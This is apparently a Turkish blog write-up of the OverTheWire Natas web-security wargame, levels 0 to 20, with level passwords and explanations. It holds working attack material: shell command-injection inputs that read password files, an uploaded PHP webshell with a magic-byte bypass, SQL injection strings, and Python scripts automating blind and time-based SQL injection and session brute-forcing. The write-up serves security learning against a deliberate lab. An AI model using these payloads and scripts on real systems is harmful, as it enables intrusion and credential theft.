Avatar
Ben Süleyman ERGEN. Siber güvenlik benim alanımdır. Bol bol ctf çözer ve write-up yazarım. Burada ise edindiğim tecrübeleri ve bilgileri paylaşıyorum.

OVERTHEWIRE NATAS WRITEUP

OVERTHEWIRE NATAS WRITEUP

Overthewire sitesinin natas web güvenliği kategorisinin ilk 15 sorusunun writeup postuna hoşgeldiniz :)

Bu blog postumda natas çözümlerini anlatmaya çalışacağım. Umarım faydası olur.


Natas 0 -> Natas 1

Sayfanın kaynak kodu her zaman çok şey söyler. Kaynak kodda 16. satırdaki yorum satırı.

<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->

Level 1 -> Level 2

Bu seviyede sayfaya sağ tıklama engellenmiş. Sayfanın kaynak kodunu görmek için geliştirici araçlarını açabiliriz. Yada sayfanın başına "view-source:" yazarak sayfanın kaynak kodunu görebiliriz.

<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->

Level 2 -> Level 3

Natas2 ye giriş yaptıktan sonra bu sayfa bişey olmadığını görüyoruz. Kaynak kodda da doğrudan bi şey yok. Fakat Dikkat edersek 1 pixel boyutunda bir resim var. Bu resmi açtığımızdada bi şey yok. Fakat resmin bulunduğu dizin "files" listelenebilir. Bu dizine girdiğimizde "users.txt" isminde bir dosya buluyoruz. Bu dosyanın içindeki bir satır natas3 şifresi.

natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Level 3 -> Level 4

Yine bu sayfada bi şey olmadığını söylüyor. Kaynak koda baktığımızda ise google ın bile bulamayacağını söylüyor. yani "robots.txt" dosyası. robots.txt dosyasına girdiğimizde izin verilmeyen bir dizin olduğunu görüyoruz. "/s3cr3t/" dizini. Bu dizine girdiğimizde bir "users.txt" dosyası, bu dosyadada natas4 için şifre mevcut.

natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

robots.txt dosyası hakkında daha fazla bilgi için google da araştırma yapabilirsiniz.


Level 4 -> Level 5

Seviyeye girdiğimizde sadece http://natas5.natas.labs.overthewire.org adresinden gelen kullanıcıların kabul edileceğini söylüyor. O zaman get isteğindeki referer bilgisini değiştirmemiz gerekiyor. Referer hangi sayfadan geldiğimizi gösteren, get yada post isteğinde bulunan bir üst bilgidir.

Firefox taryıcısından geliştirici seçeneklerinden ağ penceresinden get isteğine sağ tıklayıp "düzenle ve gönder diyerek" referer bilgisini değiştirebilirsiniz.

natas5: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Level 5 -> Level 6

Natas 5 e giriş yaptıktan sonra giriş yapmadığımız uyarısı alıyoru. Bazen web sayfaları giriş bilgisini "cookie" lerde saklarlar. Sayfanın cookie değerlerine baktığımızda "loggedin" diye bir çerez görüyozuz. değeri 0. Bu değeri herhangi bir eklenti kullanarak değiştirebilirsiniz. Ardından sayfayı yeniledikten sonra natas 6 şifresi ekrana gelecektir.

natas6: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Level 6 -> Level 7

Bu seviyede input giriş yeri bide sayfanın kaynak kodu var.

<?
include "includes/secret.inc";

  if(array_key_exists("submit", $_POST)) {
    if($secret == $_POST['secret']) {
    print "Access granted. The password for natas7 is <censored>";
  } else {
    print "Wrong secret";
  }
  }
?>

Kaynak koda baktığımızda bizim gönderdiğimiz secret değişkeni $secret ile karşılaştırılıyor. Fakat $secret tanımlanmamış. include ile başlayan satırdaki dosyaya baktığımızda $secret değişkeninin değerini görebiliriz.

http://natas6.natas.labs.overthewire.org/includes/secret.inc adresine gittiğimizde dosyayı görebiliriz.

<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>

Natas7 için şifre:

natas7: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Level 7 -> Level 8

Sanfanın url kısmını incelediğimizde "index.php?page=home" kısmı oldukça ilginç geliyor. ? ile bir sayfa sorgulanıyor. Yani sunucudaki herhangi bir dosyayı görüntüleyebiliriz.

Ayrıda sayfanın kaynak koduna baktığımızda natas8 şifresinin "/etc/natas_webpass/natas8" dosyasında olduğunu görüyoruz. O zaman bu dosyayı sorgulayabiliriz. "index.php?page=/etc/natas_webpass/natas8" şeklinde urlyi düzenleyerek natas 8 şifresini görebiliriz.

natas8: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Level 8 -> Level 9

Bu seviyede "view soursecode" kısmındaki php kodunu incelediğimizde bizim gönderdiğimiz verinin bir işlemden geçirilerek karşılaştırıldığını görüyoruz.

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

// girdiğimiz veri bu fonksiyonda işleme sokuluyor.
function encodeSecret($secret) {
  return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
  if(encodeSecret($_POST['secret']) == $encodedSecret) {
  print "Access granted. The password for natas9 is <censored>";
  } else {
  print "Wrong secret";
  }
}
?>

encodeSecret() fonksiyonunun tersini $encodedSecret değişkenine uygularsak, sonucu bulabiliriz.

<php
echo base64_decode(strrev(hex2bin("3d3d516343746d4d6d6c315669563362")));
>

Bu kodun sonucu bize girmemiz gereken kodu verecek. Bu kodda: "oubWYf2kBq". Ardından natas9 şifresi ekranda.

natas9: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Level 9 -> Level 10

Php kodunu incelediğimizde aradığımız değer needle içinde saklanıyor. Bu değişkeni boş girmediğimizde dictionary.txt dosyasında aranıyor ve sonuç ekranda gösteriliyor. Bu arama işlemi shell tarafından yapılıyor. Ayrıca girdiğimiz değerler kontrol edilmeden işleme alınıyor. Yani sunucu üzerinde istediğimiz kodu çalıştırabiliriz.

 <?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
  $key = $_REQUEST["needle"];
}

if($key != "") {
  passthru("grep -i $key dictionary.txt");
}
?>

grep -i $key dictionary.txt incelediğimizde $key değişkenine biseyler; ls -al # gibi bir şey girersek php dosyasının olduğu dizini görebiliriz. Bunun gibi hayal gücümüzü kullanarak istediğimiz komutu çalıştırabiliriz.

Uzatmadan aaa; cat /etc/natas_webpass/natas10 # gibi bi şey girerek natas 10 şifresine ulaşabiliriz.

natas10: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Level 10 -> Level 11

Bir önceki seviyedeki gibi fakat bash metakarakterleri filtrelenmiş. ; & | gibi karakterler filtreli. Demek oluyor ki ya başka bir karakter bulacağız yada bu karakterleri kullanmadan şifreyi alacağız.

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
  $key = $_REQUEST["needle"];
}

if($key != "") {
  if(preg_match('/[;|&]/',$key)) {
    print "Input contains an illegal character!";
  } else {
    passthru("grep -i $key dictionary.txt");
  }
}
?>

grep -i $key dictionary.txt deki $key yerine "/etc/natas_webpass/natas11" dosyasında arama yapmasını sağlayacak bir girdi verebiliriz. O zaman girdimiz . /etc/natas_webpass/natas11 # gibi bir şey olabilir. Nokta bashte herhangi bir karakter demektir.

natas11: U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Level 11 -> Level 12

Bu seviye biraz sor şifrelemesi açığını bilmek gerektiriyor. Xor şifrelemesi ile ilgili bilgiye [sadi evren seker][3] in blog postundan ulaşabilirsiniz. Bu şifrelemenin barındırdığı açığa ilgili bilgiyede [buradaki][4] wikiperia sayfasından ulaşabilirsiniz.

Şifreleme işlemini yapan fonksiyon aşağıda:

function xor_encrypt($in) {
  $key = '<censored>';
  $text = $in;
  $outText = '';

  // Iterate through each character
  for($i=0;$i<strlen($text);$i++) {
  $outText .= $text[$i] ^ $key[$i % strlen($key)];
  }

  return $outText;
}

Xor işlemi ile ilgili şunu biliyoruz.

 • A xor B = C
 • A xor C = B
 • B xor C = A

Şifreleme algoritmasını dikkate aldığımızda plaintext xor key = ciphertext ise o zaman plaintext xor ciphertext = key olması gerekmez mi? Yani bizim cookie miz ile php kodundaki $defaultdata yı xor işlemine tabi tutarsak anahtarı bulmuş oluruz. Eğer rengi değiştirdiyseniz $defaultdata daki bgcolor değerinede girdiğiniz rengi yazmanız gerekir.

function xor_encrypt($in) {
  $key = json_encode(array( "showpassword"=>"no", "bgcolor"=>"#ffffff"));
  $text = $in;
  $outText = '';

  // Iterate through each character
  for($i=0;$i<strlen($text);$i++) {
  $outText .= $text[$i] ^ $key[$i % strlen($key)];
  }

  return $outText;
}

// Bu kodun çıktısı bize keyi verecek
echo xor_encrypt(base64_decode($cookie));

Bu kodun çıktısı qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq gibi bir şey olacak. Tekrar eden dize bizim keyimiz. Key değerini bulduk: qw8J.

Artık key ile istediğimiz değeri işleme alarak yeni cookie değerimizi bulabiliriz. Yani amacımız showpassword değerini "yes" olarak değiştirmek.

function xor_encrypt($in) {
  $key = "qw8J";
  $text = $in;
  $outText = '';

  // Iterate through each character
  for($i=0;$i<strlen($text);$i++) {
  $outText .= $text[$i] ^ $key[$i % strlen($key)];
  }

  return $outText;
}

// yeni cookie değerimiz ekrana gelecek.
echo base64_encode(xor_encrypt(json_encode(array( "showpassword"=>"yes", "bgcolor"=>"#ffffff"))));

Yeni cookie değerimiz: ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK. Bu değeri geliştirici seçeneklerinden javascript konsolundan şu şekilde değiştirebiliriz:

document.cookie="data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
natas12: EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3

Level 12 -> Level 13

Sayfanın kaynak kodunu incelediğimizde genRandomString() fonksiyonu 10 karakter uzunluğunda rastgele bir string üretiyor. makeRandomPath() ve makeRandomPathFromFilename() yüklediğimiz dosya için bir isim ve dizin oluşturuyor. if bloğunda ise; eğer biz port metodu ile bir dosya gönderirsek bu dosyayı upload/ dizinine rastgele bir isimle kaydediyor.

Normal koşullarda yüklememiz gereken dosya jpg dosyası. Bunu sayfanın kaynak kodundaki <input type="hidden" name="filename" value="<? print genRandomString(); ?>.jpg" /> satırından anlayabliyoruz. Eğer biz resim dosyası yerine php dosyası yüklemek istesek? O zaman geliştirici seçeneklerinden sayfanın bu kısmına midahale edeceğiz. Geliştirici araçlarından dosya uzantısını php olarak değiştirin. ardından sisteme istediğiniz php dosyasını yükleyebilirsiniz. Ben kısaca natas13 şifresini ekrana basan şu php kodunu yükleyerek seviyeyi atladım:

<?php
echo system("cat /etc/natas_webpass/natas13");
?>

Buna benzer bi kodla size natas13 şifresini ekrana basabilirsiniz.

natas13: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

Level 13 -> Level 14

Bir önceki seviyedeki ile aynı fakat bu sefer yüklediğimiz dosyalar üzerinde daha fazla kontrol var. exif_imagetype($_FILES['uploadedfile']['tmp_name']) fonksiyonu ile yüklediğimiz dosyalar magic byte kontrolünden geçiyor. Magic byte her dosyanın başında bulunan ve dosyanın türünü gösteren birkaç byte dir. İnternetten araştırarak magicbyte ile ilgili daha fazla bilgiye ulaşabilirsiniz.

[Buradaki][5] formu inceleyerek fonksiyon hakkında daha fazla bilgi alabilir ve bu fonksiyonu nasıl bypass edebileceğinizi anlayabilirsiniz. Bu formdaki python kodunu kullanarak gerekli dosyayı oluşturdum ve sisteme yükleyerek natas14 şifresini elde ettim.

f = open('shell.php','w')
# \x ile başlayan karakterler jpg magicbytleri.
f.write('\xFF\xD8\xFF\xE0' + '<? system("cat /etc/natas_webpass/natas14"); ?>')
f.close()

Programı çalıştırıp oluşan dosyayı sisteme yükleyerek şifreyi alabilirsiniz.

natas14: Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Level 14 -> Level 15

Bu seviye SQLinjection ile ilgili. SQLinjection kullanıcıdan gelen verinin kontrol edilmeden doğrudan sql sorgusuna dahil edilmesinden delayı kaynaklanır. Kullancı sqlde metakarakterker girerek sql sorgusunu değiştirebilir. Bu sayede veritabanından bilgi çekebilir yada sql sorgusunun sunucunun doğru(True) dönmesini sağlayabilir. İnternette araştırarak SQLinjection ile ilgili daha ayrıntılı bilgi edinebilirsiniz.

Soruya dönecek olursak giriş yapmamızı istiyor. Kaynak kodu incelersek girdiğimiz verilerin kontrol edilmeden kullanıldığını görüyoruz.

$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";

Buradaki sql sorgusuna müdahale etmemiz gerek. O zaman kullanıcı adını biseyler" gibi bir şey ile değiştirirsek sql sorgusunu çifttırnak ile değiştirmiş oluruz. sorgunmuz SELECT * from users where username="biseyler""... (… sorgunun devamı demek. Hepsini yazmamı beklemediniz değil mi:) ) şeklinde değişir. Yani araya çifttırnak ekledik. biseyler" or 1=1 gibi bir şey girersek sorgumuz ``SELECT * from users where username="biseyler" or 1=1"… heline gelir. or 1=1 ile sorgumuzun sonucunun True gelmesini sağladık. Ama bi sorun var ikinci çifttırnak sorguda syntax hatasına yol açar. Bunu çözmek için yorum satırı ekleyebiliriz. # sql de yorum satırı demektir. Girdimiz biseyler" or 1=1 #` şeklide olursa sql sorgumuzun son hali:

SELECT * from users where username="biseyler" or 1=1 #" and passowrd="biseyler"

# dan sonraki yorum satırı olduğu için dikkate alınmayacak ve sorgumuzun sonucu doğru dönecek. Şifreye ihtiyacımız olmadan giriş yaptık.

natas15: AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

Level 15 -> Level 16

Bu seviyedeki php kodunu incelediğimizde "blind sql injection" olduğunu görebiliriz. Yani sql cıktısını bize geri döndermiyor. Fakat yinede çıktıdan doğru sql sorgusu ile bir şeyler yapabiliriz.

<?
/*
CREATE TABLE `users` (
 `username` varchar(64) DEFAULT NULL,
 `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
  $link = mysql_connect('localhost', 'natas15', '<censored>');
  mysql_select_db('natas15', $link);

  $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
  if(array_key_exists("debug", $_GET)) {
    echo "Executing query: $query<br>";
  }

  $res = mysql_query($query, $link);
  if($res) {
  if(mysql_num_rows($res) > 0) {
    echo "This user exists.<br>";
  } else {
    echo "This user doesn't exist.<br>";
  }
  } else {
    echo "Error in query.<br>";
  }

  mysql_close($link);
} else {
?>

sayfadaki girdiye natas16 yazdığımızda kullanıcının olduğunu görüyoruz. Sorguyu şu şekilde yaparsak parola ile ilgili bilgi alabiliriz. natas16" AND password LIKE "%a%" #. Burada parola içinde 'a' karakterinin geçtiğini yada geçmediğini anlayabiliriz. Eğer bütün karakterler için bu işlemi yaparsak şifrenin hangi karakterlerden oluştuğunu buluruz. Daha sonra bu karakterler ile bruteforce yaparak şifreyi elde edebiliriz.

Bruteforce saldırısı için python scripti yazabiliriz. Bu script için requests modülünü kullandım. Aşağıdaki python kodu 2 aşamadan oluşuyor:

 • Aşama 1: Şifrenin ilerdiği karakterlerin bulunması. Bu aşama ile bruteforce saldırı süresini önemli ölçüde kısaltırız.
 • Aşama 2: Bulunan karakterler ile bruteforce saldırısı yap.
import requests
from requests.auth import HTTPBasicAuth

chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
filtered = ''
passwd = ''

for char in chars:
  Data = {'username' : 'natas16" AND password LIKE "%' + char + '%" #'} # request ile gönderilecek parametre
  r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?', auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data)
  if 'exists' in r.text: # eğer kullanıcı mevcutsa.
    filtered += char ## kullanıcı mevcutsa karakteri ekler.
    print(filtered)

for i in range(0,32): # password 32 haneli
  for char in filtered: #bulunan karakterlerde dolaş. bruteforce saldırısını kolaylaştırır.
    Data = {'username' : 'natas16" AND password LIKE "' + passwd + char + '%" #'}
    r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?', auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data)
    if 'exists' in r.text : # şifrenin bir sonraki henesini bulur.
      passwd += char
      print(passwd)
      break

Bu script için requests modülünü kullandım. İşte natas16 şifresi:

natas16: WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

Level 16 -> Level 17

Çalıştırılan bash kabuğuna giren girdi güvenlik filtresinden geçiyor. Bu yüzden bir çok meta karakteri kullanamıyoruz.

<?
  $key = "";

  if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
  }

  if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
      print "Input contains an illegal character!";
    } else {
      passthru("grep -i \"$key\" dictionary.txt");
    }
  }
?>

Bu soru için subshell den yararlanabiliriz. $() gibi bir yapısı var. Bir önceki sevideki mantık ile aynı. Eğer /etc/natas_webpass/natas17 dosyasındaki karakterleri sırayla bulabiliriz. Ve bu karakterleri bruteforce için kullanabiliriz.

doomed$(grep a /etc/natas_webpass/natas17) şeklinde bir girdi ile karakterleri bulabiliriz. $() içindeki komut bir çıktı üretir ve bu çıktıyı komuta ekler. Eğer aradığımız karakter natas17 dosyasında var ise bunu 'doomed' in sonuna ekler. Yani eğer bir şey bulursa şifreyi 'doomed!' in sonuna ekleyecek ve php kodundaki grep bir sonuç döndürmeyedek. bu sayede biz bir karakter natas17 dosyasında var mı yok mu anlayacağız. Eğer varsa bir sonuç döndürmeyecek, eğer yoksa döndürecek.

Bruteforce saldırısı için python scripti yazabiliriz. Bu script için requests modülünü kullandım. Aşağıdaki python kodu 2 aşamadan oluşuyor:

 • Aşama 1: Şifrenin ilerdiği karakterlerin bulunması. Bu aşama ile bruteforce saldırı süresini önemli ölçüde kısaltırız.
 • Aşama 2: Bulunan karakterler ile bruteforce saldırısı yap.
import requests 
from requests.auth import HTTPBasicAuth 
 
auth=HTTPBasicAuth('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh') # giriş doğrulaması
 
filteredchars = '' 
passwd = '' 
allchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'

for char in allchars: # karakterleri sırayla dolaş.
  r = requests.get('http://natas16.natas.labs.overthewire.org/?needle=doomed$(grep ' + char + ' /etc/natas_webpass/natas17)', auth=auth) 

  if 'doomed' not in r.text: # bulunan karakteri ekle. yani şifrede olan karakteri.
    filteredchars = filteredchars + char 
    print(filteredchars) 
 
for i in range(32):  # şifre 32 karakter.
  for char in filteredchars: # bulunan karakterler ile bruteforce saldırısı yap.
    r = requests.get('http://natas16.natas.labs.overthewire.org/?needle=doomed$(grep ^' + passwd + char + ' /etc/natas_webpass/natas17)', auth=auth) 

    if 'doomed' not in r.text: # eğer bir sonuç yoksa karakteri şifreye ekle sonra yeni karaktere geç.
      passwd = passwd + char 
      print(passwd) 
      break

İşte natas17 şifresi:

natas17: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

Level 17 -> Level 18

<?

  /*
  CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
  );
  */

  if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas17', '<censored>');
    mysql_select_db('natas17', $link);

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
      echo "Executing query: $query<br>";
    }

    $res = mysql_query($query, $link);
    if($res) {
    if(mysql_num_rows($res) > 0) {
      //echo "This user exists.<br>";
    } else {
      //echo "This user doesn't exist.<br>";
    }
    } else {
      //echo "Error in query.<br>";
    }

    mysql_close($link);
  } else {
?>

Bu seviyede biz ne girersek girelim bir çıktı varmiyor. Zaten php kodunu inceleyerek bunu anlayabiliriz. O zaman ne yapacağız? Sql de çalışmayı duraklatan bir fonksiyon var: sleep(). Bu fonksiyonu kullanarak yanıtın gelme süresine göre çıkarım yapabiliriz. Sql sorgusunu şu hale getirirsek SELECT * FROM users WHERE username="natas18" AND sleep(5) yanıt 5 en az 5 saniye sonra gelecek. Çünkü sunucuda sql sorgusu 5 saniye duraklatılıyor. Sorguyu biraz daha geliştirirsek: SELECT * FROM users WHERE username="natas18" AND password LIKE BINARY "%a%" sleep(5) şifrenin içinde a bulunması halinde cevap bize 5 saniye sonra gelecek. basit bir python scripti ile bu işlemi hemen yapabiliriz. Script aşağıda.

import requests
from requests.auth import HTTPBasicAuth

allchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
filteredchars = ""
passwd = ""

# post formu olduğu için bu header gerekli
headers = {'content-type': 'application/x-www-form-urlencoded'}
Auth = HTTPBasicAuth("natas17", "8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw")

for char in allchars: # karakterleri dolaş ve şifredeki karakterleri bul.
  payload = 'username=natas18" AND password LIKE BINARY "%{}%" AND sleep(2) #'.format(char) # 2 saniye bekle
  r = requests.post('http://natas17.natas.labs.overthewire.org/index.php',data=payload, auth=Auth, headers=headers)
  if (r.elapsed.seconds >= 2): # eğer cevap 2 saniyeden sonra gelirse şifrede o karakter var demektir.
    filteredchars += char # karakteri ekle
    print(filteredchars)
print("filteredchars: "+filteredchars)

for _ in range(32):
  for chr in filteredchars:
    payload = 'username=natas18" AND password LIKE BINARY "{}%" AND sleep(2) #'.format(passwd+chr)
    r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', data=payload, auth=Auth, headers=headers)
    if r.elapsed.seconds >= 2: # eğer 2 saniyeden büyükse şifreye o karakteri ekle.
      passwd += chr
      print(passwd)
      break # gereksiz deneme yapmaktan kurtarır.
print("password: "+passwd)
natas18: xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP

Level 18 -> Level 19

Bu seviyedeki php kodunu incelediğimizde $_SESSION["admin"] değerini php kodu içinden değiştirmek mümkün değil. Bu yüzden başka bir yol izlememiz gerekiyor. Php sessionlar ile ilgili daha ayrıntılı bilgiyi buradan bulabilirsiniz.

Toplamda 640 tane session var ve bunlardan biri admin için ayrılmış olmak zorunda. Bu yüzden tek yapmamız gereken admine ait session değerini bulmak. Bunu tek tek cookie değerini değiştirerek yapabiliriz. Bunun için 10 satırlık bir python scripti hazırladım. tek yaptığım şey session değerini 640 a kadar denemek. İşte script:

import requests
from requests.auth import HTTPBasicAuth

Auth = HTTPBasicAuth("natas18", "xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP")
for _i in range(640): # 0 dan 640 a kadar olan bütün session ları dene
  r = requests.get("http://natas18.natas.labs.overthewire.org/index.php?debug", auth=Auth, cookies={"PHPSESSID": str(_i)})
  if not "regular" in r.text: # eğer admin sağlanırsa işlem bitti.
    print("found: ", _i)
    continue
  print(_i)

Natas 19 için şifre:

natas19: 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs

Level 19 -> Level 20

Bu seviyede session değerlerinin sıralı olmadığını söylüyor. Zaten cookie değerlerini incelediğimizde (defalarca kez giriş yaparak) bunu farkedebiliriz.

Cookileri biraz daha dikkatli incelersek değerlerin a-f ve 0-9 arasında değiştiğini görürüz. o zaman bu bir hex olabilir. İnternetten herhangi bir "hex to text" dönüşümü yapan bir siteye girip cookie değerini hex den text e dönüştürdüğünüzde "123-kullaniciadi" biçiminde '-' karakteri ile ayrılmış şekilde bir sayı ve girdiğimiz kullanıcı adını görürüz. Buradaki sayı 0 ile 640 arasında olacak. O zaman yapmamız gereken tek şey buradaki sayı değerlerini değiştirip hex dönüşümü yaparak cookie değerlerini değiştirmek. Bu iş için basit bir python scripti:

import requests
from requests.auth import HTTPBasicAuth

Auth = HTTPBasicAuth("natas19", "4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs")
for _i in range(640):
  ses = str(_i)+"-admin" # hex dönüşümü için text hazırla
  session = ses.encode("utf-8").hex() # metni hexe dönüştür.
  r = requests.post("http://natas19.natas.labs.overthewire.org/index.php?debug", auth=Auth,
          cookies={"PHPSESSID": session}, headers={"Content-Type":"application/x-www-form-urlencoded"}, data={"username":"admin", "password":"admin"}) # bilgileri gir ve cookie değerine bulduğumuz hex değerini gir.
  if not "regular" in r.text:
    print("found: ", session) # admin için cookie session değerini göster.
    break
  print(session)

İşte natas20 şifresi:

natas20: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF

all tags